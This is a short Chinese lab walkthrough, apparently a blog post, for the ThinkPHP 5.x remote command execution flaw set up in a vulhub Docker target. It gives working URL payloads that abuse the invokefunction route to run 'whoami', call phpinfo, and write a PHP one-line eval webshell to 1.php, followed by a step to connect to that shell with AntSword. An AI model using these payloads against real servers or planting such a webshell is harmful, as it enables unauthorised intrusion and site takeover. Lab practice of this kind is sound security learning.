Thinkphp5x远程命令执行 靶场攻略

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

[]=whoami

3.远程代码执行

POC:

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[

1][]=-1

4.写入一句话木马到根目录下的1.php

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > 1.php

5.蚁剑连接

相关推荐
秋の花几秒前
【JAVA基础】Java集合基础
java·开发语言·windows
小松学前端3 分钟前
第六章 7.0 LinkList
java·开发语言·网络
Wx-bishekaifayuan10 分钟前
django电商易购系统-计算机设计毕业源码61059
java·spring boot·spring·spring cloud·django·sqlite·guava
customer0815 分钟前
【开源免费】基于SpringBoot+Vue.JS周边产品销售网站(JAVA毕业设计)
java·vue.js·spring boot·后端·spring cloud·java-ee·开源
全栈开发圈17 分钟前
新书速览|Java网络爬虫精解与实践
java·开发语言·爬虫
WaaTong19 分钟前
《重学Java设计模式》之 单例模式
java·单例模式·设计模式
面试鸭21 分钟前
离谱!买个人信息买到网安公司头上???
java·开发语言·职场和发展